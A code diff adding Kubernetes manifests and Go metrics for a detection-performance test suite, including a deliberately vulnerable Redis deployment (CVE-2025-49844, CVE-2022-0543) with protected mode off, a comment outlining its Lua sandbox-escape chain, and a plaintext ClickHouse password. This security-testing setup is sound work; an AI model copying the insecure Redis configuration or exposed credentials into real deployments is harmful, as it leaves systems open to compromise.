pods/exec + - pods/portforward + - pods/attach + - clusterrolebindings + - rolebindings + scope: '*' + failurePolicy: Ignore diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml new file mode 100644 index 00000000000..051fb34d176 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml @@ -0,0 +1,87 @@ +# Vector Helm values for iximiuz lab — kubescape node-agent → ClickHouse +# Deploy: helm install vector vector/vector -n honey -f values.yaml + +role: "Agent" + +image: + repository: timberio/vector + pullPolicy: IfNotPresent + +resources: + requests: + cpu: 50m + memory: 64Mi + limits: + cpu: 200m + memory: 128Mi + +tolerations: + - operator: Exists + +env: + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + +customConfig: + data_dir: /vector-data-dir + api: + enabled: true + address: 127.0.0.1:8686 + playground: false + + sources: + kubescape_nodeagent_logs: + type: kubernetes_logs + extra_label_selector: "app=node-agent" + + transforms: + kubescape_parse: + type: remap + inputs: + - kubescape_nodeagent_logs + source: | + . = parse_json!(.message) + + kubescape_filter: + type: filter + inputs: + - kubescape_parse + condition: '.BaseRuntimeMetadata != null' + + kubescape_enrich: + type: remap + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + + sinks: + kubescape_debug: + type: file + inputs: + - kubescape_enrich + encoding: + codec: json + path: "/tmp/kubescape.json" + + kubescape_clickhouse: + type: clickhouse + inputs: + - kubescape_enrich + database: forensic_db + table: kubescape_logs + endpoint: "http://clickhouse.forensic.austrianopencloudcommunity.org:8123" + skip_unknown_fields: true + date_time_best_effort: true + auth: + strategy: "basic" + user: pixie + password: pixie_password + batch: + max_bytes: 5000000 + timeout_secs: 2 diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml new file mode 100644 index 00000000000..ed14ac92b4e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml @@ -0,0 +1,307 @@ +--- +# Source: vector/templates/serviceaccount.yaml +apiVersion: v1 +kind: ServiceAccount +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +automountServiceAccountToken: true +--- +# Source: vector/templates/configmap.yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +data: + vector.yaml: | + api: + address: 127.0.0.1:8686 + enabled: true + playground: false + data_dir: /vector-data-dir + sinks: + kubescape_clickhouse: + auth: + password: pixie_password + strategy: basic + user: pixie + batch: + max_bytes: 5000000 + timeout_secs: 2 + database: forensic_db + date_time_best_effort: true + endpoint: http://clickhouse.forensic.austrianopencloudcommunity.org:8123 + inputs: + - kubescape_enrich + skip_unknown_fields: true + table: kubescape_logs + type: clickhouse + kubescape_debug: + encoding: + codec: json + inputs: + - kubescape_enrich + path: /tmp/kubescape.json + type: file + sources: + kubescape_nodeagent_logs: + extra_label_selector: app=node-agent + type: kubernetes_logs + transforms: + kubescape_enrich: + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + type: remap + kubescape_filter: + condition: .BaseRuntimeMetadata != null + inputs: + - kubescape_parse + type: filter + kubescape_parse: + inputs: + - kubescape_nodeagent_logs + source: | + . = parse_json!(.message) + type: remap +--- +# Source: vector/templates/rbac.yaml +# Permissions to use Kubernetes API. +# Requires that RBAC authorization is enabled. +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +rules: + - apiGroups: + - "" + resources: + - namespaces + - nodes + - pods + verbs: + - list + - watch +--- +# Source: vector/templates/rbac.yaml +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: vector +subjects: + - kind: ServiceAccount + name: vector + namespace: "honey" +--- +# Source: vector/templates/service-headless.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector-headless + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + clusterIP: None + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/service.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/daemonset.yaml +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +spec: + selector: + matchLabels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + minReadySeconds: 0 + template: + metadata: + annotations: + checksum/config: 6840eb68ad4549d7f15ba76da2b37fd179c92f96d58d1ae0f60ff90a4b9e5554 + labels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + vector.dev/exclude: "true" + spec: + serviceAccountName: vector + dnsPolicy: ClusterFirst + containers: + - name: vector + image: "timberio/vector:0.54.0-distroless-libc" + imagePullPolicy: IfNotPresent + args: + - --config-dir + - /etc/vector/ + env: + - name: VECTOR_LOG + value: "info" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: VECTOR_SELF_POD_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: PROCFS_ROOT + value: "/host/proc" + - name: SYSFS_ROOT + value: "/host/sys" + ports: + - name: api + containerPort: 8686 + protocol: TCP + resources: + limits: + cpu: 200m + memory: 128Mi + requests: + cpu: 50m + memory: 64Mi + volumeMounts: + - name: data + mountPath: "/vector-data-dir" + - name: config + mountPath: "/etc/vector/" + readOnly: true + - mountPath: /var/log/ + name: var-log + readOnly: true + - mountPath: /var/lib + name: var-lib + readOnly: true + - mountPath: /host/proc + name: procfs + readOnly: true + - mountPath: /host/sys + name: sysfs + readOnly: true + terminationGracePeriodSeconds: 60 + tolerations: + - operator: Exists + volumes: + - name: config + projected: + sources: + - configMap: + name: vector + - name: data + hostPath: + path: "/var/lib/vector" + - hostPath: + path: /var/log/ + name: var-log + - hostPath: + path: /var/lib/ + name: var-lib + - hostPath: + path: /proc + name: procfs + - hostPath: + path: /sys + name: sysfs diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/loadgen-k6.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/loadgen-k6.yaml new file mode 100644 index 00000000000..e11cec84c5a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/loadgen-k6.yaml @@ -0,0 +1,133 @@ +# loadgen — tier 1 (HTTP client) hammering the API backend so all three +# tiers carry sustained traffic for the duration of the experiment. +# k6 chosen over fortio/hey because we want: +# - mixed verbs (~80% GET, ~20% POST) to keep both cache + DB paths hot +# - randomized GET ids to vary cache hit ratio +# - one container image, declarative script, no per-target script files +# +# Tunables (override via env on the Deployment): +# K6_VUS: concurrent virtual users (default 50) +# K6_QPS: target requests/sec (default 500). At 500 QPS sustained, +# expect ~550 redis ops/sec + ~50-100 pgsql ops/sec at steady +# state (depending on cache TTL turnover). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: loadgen-k6-script + namespace: redis + labels: + app.kubernetes.io/name: loadgen + app.kubernetes.io/part-of: sovereign-soc +data: + script.js: | + import http from 'k6/http'; + import { check, sleep } from 'k6'; + + const API = __ENV.API_URL || 'http://api:8080'; + + // constant-arrival-rate gives a stable QPS regardless of API latency. + // preAllocatedVUs is the steady-state worker pool; maxVUs caps the + // upper bound k6 will spawn under tail latency. K6_DURATION='8760h' + // is effectively infinite (1 year) — k6 doesn't have a true forever + // mode and the default executor rejects duration=0. + export const options = { + scenarios: { + steady: { + executor: 'constant-arrival-rate', + rate: Number(__ENV.K6_QPS || 500), + timeUnit: '1s', + duration: __ENV.K6_DURATION || '8760h', + preAllocatedVUs: Number(__ENV.K6_VUS || 50), + maxVUs: Number(__ENV.K6_MAX_VUS || 200), + }, + }, + }; + + export default function () { + const r = Math.random(); + if (r < 0.80) { + // Hot path: random GET 1..100. Cache hit/miss mix depends on TTL. + const id = 1 + Math.floor(Math.random() * 100); + const res = http.get(`${API}/api/item/${id}`, { tags: { op: 'get_item' } }); + check(res, { 'GET 200': (r) => r.status === 200 }); + } else { + // Write path: append to events table, busts a few cache entries. + const body = JSON.stringify({ ts: Date.now(), val: Math.random() }); + const res = http.post(`${API}/api/event`, body, { + headers: { 'Content-Type': 'application/json' }, + tags: { op: 'post_event' }, + }); + check(res, { 'POST 201': (r) => r.status === 201 }); + } + } +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: loadgen + namespace: redis + labels: + app.kubernetes.io/name: loadgen + app.kubernetes.io/part-of: sovereign-soc +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: loadgen + template: + metadata: + labels: + app.kubernetes.io/name: loadgen + app.kubernetes.io/part-of: sovereign-soc + # Exclude k6 from kubescape detection — the loadgen is the + # adversary in the threat model, not a normal app pod. + kubescape.io/ignore: "true" + spec: + containers: + - name: k6 + image: grafana/k6:0.51.0 + imagePullPolicy: IfNotPresent + command: ["/bin/sh", "-c"] + # k6 needs the API to be reachable; the gunicorn pods need ~25 s + # to pip-install + start. Retry on connection refused. + args: + - | + set -e + until wget -q -O /dev/null --timeout=3 http://api:8080/healthz; do + echo "waiting for api..." + sleep 2 + done + echo "api reachable, starting k6" + exec k6 run \ + --no-summary \ + --no-thresholds \ + /etc/loadgen/script.js + # The three K6_* values define the 1× load profile and are + # the names MultiTierAppWorkload patches via strategic-merge + # for higher multipliers. Always keep all three in this list + # so the kustomize merge has a name-key to match on. + env: + - {name: K6_QPS, value: "500"} + - {name: K6_VUS, value: "50"} + - {name: K6_MAX_VUS, value: "200"} + - {name: API_URL, value: "http://api:8080"} + # K6_DURATION intentionally unset — script defaults to '8760h' + # (effectively forever). k6 has no true infinite mode and JS + # `||` treats '0s' as truthy, so don't pass '0s' here. + volumeMounts: + - {name: script, mountPath: /etc/loadgen} + # At 64× = 32 000 QPS k6 needs both real CPU (request rate is + # CPU-bound once the API responds in sub-ms) and a wide memory + # budget. Sizing rationale: + # - 3200 preallocated VUs × ~0.5 MB goroutine stack ≈ 1.6 GB + # - 12 800 maxVUs burst × ~0.5 MB ≈ 6 GB worst case + # - k6's own runtime + buffers + JS heap ≈ 1 GB + # Without these limits the high multipliers silently throttle + # (OOM or CFS) and deliver a fraction of the configured QPS. + resources: + requests: {cpu: "4", memory: "1Gi"} + limits: {cpu: "16", memory: "8Gi"} + volumes: + - name: script + configMap: {name: loadgen-k6-script} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres-sbob.yaml new file mode 100644 index 00000000000..5e2c90c1fa0 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres-sbob.yaml @@ -0,0 +1,20 @@ +--- +# Empty user-defined ApplicationProfile for the postgres container. See +# redis-sbob.yaml for the rationale; same pattern, container name `postgres` +# matches postgres.yaml. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: postgres-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: postgres + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres.yaml new file mode 100644 index 00000000000..265d784e99a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres.yaml @@ -0,0 +1,108 @@ +# postgres — tier 3 (persistent data) for the multi-protocol three-tier +# load fixture. Deployed in the `redis` namespace alongside the existing +# redis pod so a single Kubescape ApplicationProfile + bobctl attack +# surface covers the whole stack. Schema seeded by initdb ConfigMap on +# first boot (idempotent: psql executes /docker-entrypoint-initdb.d/*.sql +# only when PGDATA is empty). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: postgres-initdb + namespace: redis + labels: + app.kubernetes.io/name: postgres + app.kubernetes.io/part-of: sovereign-soc +data: + init.sql: | + -- items: GET path hot table, served from redis cache. + CREATE TABLE IF NOT EXISTS items ( + id INTEGER PRIMARY KEY, + name TEXT NOT NULL, + data TEXT NOT NULL + ); + -- events: POST path append-only sink, also invalidates redis. + CREATE TABLE IF NOT EXISTS events ( + id BIGSERIAL PRIMARY KEY, + created TIMESTAMPTZ NOT NULL DEFAULT now(), + payload TEXT NOT NULL + ); + -- Pre-populate 100 items so the loadgen's random-id GET hits a real + -- row most of the time (cache hit/miss ratio is observable in + -- redis_events vs pgsql_events rate). + INSERT INTO items (id, name, data) + SELECT i, + 'item-' || i, + md5(i::text) || md5((i+1)::text) || md5((i+2)::text) + FROM generate_series(1, 100) AS s(i) + ON CONFLICT (id) DO NOTHING; + CREATE INDEX IF NOT EXISTS events_created_idx ON events (created DESC); +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: postgres + namespace: redis + labels: + app.kubernetes.io/name: postgres + app.kubernetes.io/part-of: sovereign-soc +spec: + replicas: 1 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: postgres + template: + metadata: + labels: + app.kubernetes.io/name: postgres + app.kubernetes.io/part-of: sovereign-soc + # Pairs with postgres-sbob.yaml's `postgres-empty` profile so + # kubescape alerts from t=0. See feedback_kubescape_empty_profile. + kubescape.io/user-defined-profile: postgres-empty + spec: + containers: + - name: postgres + image: postgres:16-alpine + imagePullPolicy: IfNotPresent + ports: + - {name: pg, containerPort: 5432} + env: + - {name: POSTGRES_DB, value: appdb} + - {name: POSTGRES_USER, value: app} + - {name: POSTGRES_PASSWORD, value: app_password} + # Alpine init script runs initdb in /var/lib/postgresql/data, + # we explicitly point PGDATA at a subpath so the mount root is + # initdb-clean (postgres refuses to init in a non-empty dir). + - {name: PGDATA, value: /var/lib/postgresql/data/pgdata} + volumeMounts: + - {name: initdb, mountPath: /docker-entrypoint-initdb.d} + - {name: data, mountPath: /var/lib/postgresql/data} + resources: + requests: {cpu: 200m, memory: 256Mi} + limits: {cpu: "2", memory: 1Gi} + readinessProbe: + exec: + command: ["pg_isready", "-U", "app", "-d", "appdb"] + initialDelaySeconds: 5 + periodSeconds: 5 + volumes: + - name: initdb + configMap: {name: postgres-initdb} + - name: data + emptyDir: {} +--- +apiVersion: v1 +kind: Service +metadata: + name: postgres + namespace: redis + labels: + app.kubernetes.io/name: postgres + app.kubernetes.io/part-of: sovereign-soc +spec: + selector: + app.kubernetes.io/name: postgres + ports: + - {name: pg, port: 5432, targetPort: pg} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-client-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-client-sbob.yaml new file mode 100644 index 00000000000..7155c37d8fc --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-client-sbob.yaml @@ -0,0 +1,20 @@ +--- +# Empty user-defined ApplicationProfile for the redis-client container. +# See redis-sbob.yaml for the full rationale. Container name `client` +# matches redis-vulnerable.yaml's second Deployment. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: redis-client-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: client + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml new file mode 100644 index 00000000000..b7d355dc179 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml @@ -0,0 +1,38 @@ +--- +# Empty user-defined ApplicationProfile for the vulnerable redis container. +# +# Why "empty" instead of the learned profile copied from the iximiuz playground: +# Kubescape's auto-learned profile starts in `status: learning` and only +# transitions to `completed` after ~5-10 min of observed traffic. Until the +# transition, R0001/R0002 don't fire — so the first ~half of a 20-min RUN +# window is "silent" and all alerts cluster at the end (verified empirically +# 2026-05-14: 75–82% of forensic_alert_count rows landed in the second half +# of the 2x/4x experiments). +# +# A *user-defined* empty profile + the matching pod label +# kubescape.io/user-defined-profile: redis-empty +# skips auto-learning and treats every syscall / exec / open / endpoint as +# unprofiled → R0002 et al. fire from t=0. Required for perf-measurement +# experiments where we want detection latency to be the variable of interest. +# +# The profile MUST exist before the pod starts (or the pod must restart +# after the profile is applied) — otherwise Kubescape falls back to +# auto-learning. PrerenderedDeploy applies all YAMLs in one shot in the +# order they appear in YAMLPaths, so list this file BEFORE +# redis-vulnerable.yaml in the WorkloadSpec. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: redis-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: redis # must match the container name in redis-vulnerable.yaml + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml new file mode 100644 index 00000000000..662c01d4908 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml @@ -0,0 +1,212 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-vulnerable.yaml (Apache-2.0 licensed). +# +# Redis 7.2.10 — vulnerable to CVE-2025-49844 + CVE-2022-0543 +# +# CVE-2025-49844: Use-After-Free in Lua parser lparser.c (all Redis < 7.2.11) +# CVE-2022-0543: Lua sandbox escape via package.loadlib (Debian packaging issue) +# +# This uses a custom image built from Dockerfile.redis-vulnerable that patches +# the Lua sandbox to reproduce the CVE-2022-0543 condition, enabling full +# sandbox escape via EVAL → package.loadlib → io.popen → shell. +# +# Deploys into its own "redis" namespace with: +# Namespace, ServiceAccount, Role, RoleBinding, Deployment, Service +--- +apiVersion: v1 +kind: Namespace +metadata: + name: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/part-of: bob-cve-2025-49844 +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: redis + namespace: redis +rules: + - apiGroups: [""] + resources: ["pods"] + verbs: ["get", "list"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: redis + namespace: redis +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: redis +subjects: + - kind: ServiceAccount + name: redis + namespace: redis +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: redis-config + namespace: redis +data: + redis.conf: | + # Disable protected mode (no auth, no bind restriction) + protected-mode no + bind 0.0.0.0 + port 6379 + + # Persistence off — ephemeral for testing + save "" + appendonly no + + # Memory limit + maxmemory 256mb + maxmemory-policy allkeys-lru + + # Logging + loglevel notice +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + cve: CVE-2025-49844 +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis + template: + metadata: + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + # Pairs with redis-sbob.yaml's `redis-empty` profile so kubescape + # treats every observed behaviour as anomalous from t=0 (skip the + # ~5-10 min auto-learning window that otherwise bunches alerts at + # the end of the RUN). See feedback_kubescape_empty_profile. + kubescape.io/user-defined-profile: redis-empty + spec: + serviceAccountName: redis + containers: + - name: redis + image: ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10 + command: ["redis-server", "/etc/redis/redis.conf"] + ports: + - containerPort: 6379 + name: redis + protocol: TCP + volumeMounts: + - name: config + mountPath: /etc/redis + readOnly: true + resources: + requests: + cpu: 250m + memory: 256Mi + limits: + cpu: "1" + memory: 512Mi + livenessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 5 + periodSeconds: 10 + readinessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 3 + periodSeconds: 5 + volumes: + - name: config + configMap: + name: redis-config +--- +apiVersion: v1 +kind: Service +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 6379 + targetPort: 6379 + protocol: TCP + name: redis +--- +# A second Service exposing Redis on a non-standard port (16379 → 6379). +# Used by the endpoint test: if the ApplicationProfile records port=0 (wildcard), +# connections on ANY port are considered "normal" — including this one. +# If the profile records only :6379, connections via :16379 should be anomalous. +apiVersion: v1 +kind: Service +metadata: + name: redis-alt-port + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/component: endpoint-test +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 16379 + targetPort: 6379 + protocol: TCP + name: redis-alt +--- +# Redis client pod — a separate workload that connects to Redis over the network. +# Attacks from this pod simulate a compromised application in the cluster: +# - Network traffic is real pod-to-pod (not port-forward from outside) +# - Node-agent sees the TCP connection in its eBPF hooks +# - Endpoint detection can verify port-based allowlisting +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis-client + namespace: redis + labels: + app.kubernetes.io/name: redis-client + app.kubernetes.io/component: endpoint-test +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis-client + template: + metadata: + labels: + app.kubernetes.io/name: redis-client + kubescape.io/user-defined-profile: redis-client-empty + spec: + containers: + - name: client + image: redis:7.2-alpine + command: ["sleep", "infinity"] + resources: + requests: + cpu: 50m + memory: 32Mi + limits: + cpu: 200m + memory: 64Mi diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-warmer.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-warmer.yaml new file mode 100644 index 00000000000..320231d54d6 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-warmer.yaml @@ -0,0 +1,69 @@ +# redis-warmer — generates ambient RESP traffic to the redis Service so +# Pixie's stirling registers the redis_events table in Vizier's schema. +# +# Without this, the sovereign-soc experiment's ClickHouseExportLoadMetric +# fails at PxL compile time with: +# Compilation failed: 31:18 Table 'redis_events' not found +# because Pixie's PEM only adds a protocol-events table to the schema +# after observing at least one packet of that protocol. +# +# Design: +# - Separate pod (NOT an initContainer on redis-vulnerable) so the +# traffic crosses the pod-to-pod boundary on the node's network +# namespace, where stirling's eBPF probes can see it. +# - Image: redis:7-alpine — pinned, contains redis-cli, ~30 MB pull +# once on first deploy. +# - PING every 2 s. Negligible load, keeps the table alive across +# Pixie's 60 s table-aging window. +# - Deployment (1 replica) instead of Job so it stays up across the +# entire experiment duration, including BURNIN and RUN phases. +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis-warmer + namespace: redis + labels: + app.kubernetes.io/name: redis-warmer + app.kubernetes.io/part-of: sovereign-soc +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis-warmer + template: + metadata: + labels: + app.kubernetes.io/name: redis-warmer + # Tag this so Vector's filter rules can drop these alerts if + # the analyst wants to exclude warmer traffic from + # forensic_db.alerts. + kubescape.io/ignore: "true" + spec: + containers: + - name: redis-warmer + image: redis:7-alpine + imagePullPolicy: IfNotPresent + command: ["/bin/sh", "-c"] + args: + - | + set -e + # Tight retry loop until the redis Service is resolvable — + # the warmer can start before redis-vulnerable's pod is + # Ready (Deployment ordering is parallel by default). + until redis-cli -h redis -p 6379 -t 2 PING >/dev/null 2>&1; do + echo "waiting for redis service..." + sleep 1 + done + echo "redis reachable, beginning warm loop" + while true; do + redis-cli -h redis -p 6379 -t 2 PING >/dev/null || true + sleep 2 + done + resources: + requests: + cpu: 5m + memory: 8Mi + limits: + cpu: 50m + memory: 32Mi diff --git a/src/e2e_test/perf_tool/pkg/suites/metrics.go b/src/e2e_test/perf_tool/pkg/suites/metrics.go index aaa7d75bbd0..f431af7d933 100644 --- a/src/e2e_test/perf_tool/pkg/suites/metrics.go +++ b/src/e2e_test/perf_tool/pkg/suites/metrics.go @@ -37,6 +37,25 @@ var heapSizeScript string //go:embed scripts/http_data_loss.pxl var httpDataLossScript string +//go:embed scripts/clickhouse_export.pxl +var clickhouseExportScript string + +//go:embed scripts/clickhouse_read.pxl +var clickhouseReadScript string + +//go:embed scripts/forensic_alerts.pxl +var forensicAlertsScript string + +// ClickHouseOperatorPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the ClickHouse operator scraper at +// a different cluster (kubeconfig/kube_context). +const ClickHouseOperatorPromRecorderName = "clickhouse-operator" + +// KubescapeNodeAgentPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the kubescape node-agent scraper +// at a different cluster. +const KubescapeNodeAgentPromRecorderName = "kubescape-node-agent" + // ProcessStatsMetrics adds a metric spec that collects process stats such as rss,vsize, and cpu_usage. func ProcessStatsMetrics(period time.Duration) *pb.MetricSpec { return &pb.MetricSpec{ @@ -133,6 +152,169 @@ func ProtocolLoadtestPromMetrics(scrapePeriod time.Duration) *pb.MetricSpec { } } +// ClickHouseExportLoadMetric runs the clickhouse export PxL script on a tight +// period to drive load against the ClickHouse write path, and reports the +// row count of each export as a metric. sourceTable is the Pixie events +// table the script reads from (e.g. "http_events", "redis_events"); +// destTable is the ClickHouse destination table. Their column shapes must +// be compatible or Kelvin will crash on the first CH server-side column +// mismatch (see ClickHouseExportSinkNode TODO). +func ClickHouseExportLoadMetric(period time.Duration, dsn string, sourceTable string, destTable string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseExportScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "source_table": sourceTable, + "dest_table": destTable, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_export_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseReadLoadMetric runs the clickhouse read PxL script on a tight +// period to drive load against the ClickHouse read path, and reports the +// row count of each readback as a metric. +func ClickHouseReadLoadMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseReadScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_read_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseOperatorMetrics scrapes the Altinity clickhouse-operator's +// metrics-exporter sidecar (`ch-metrics` port 8888), which proxies per-shard 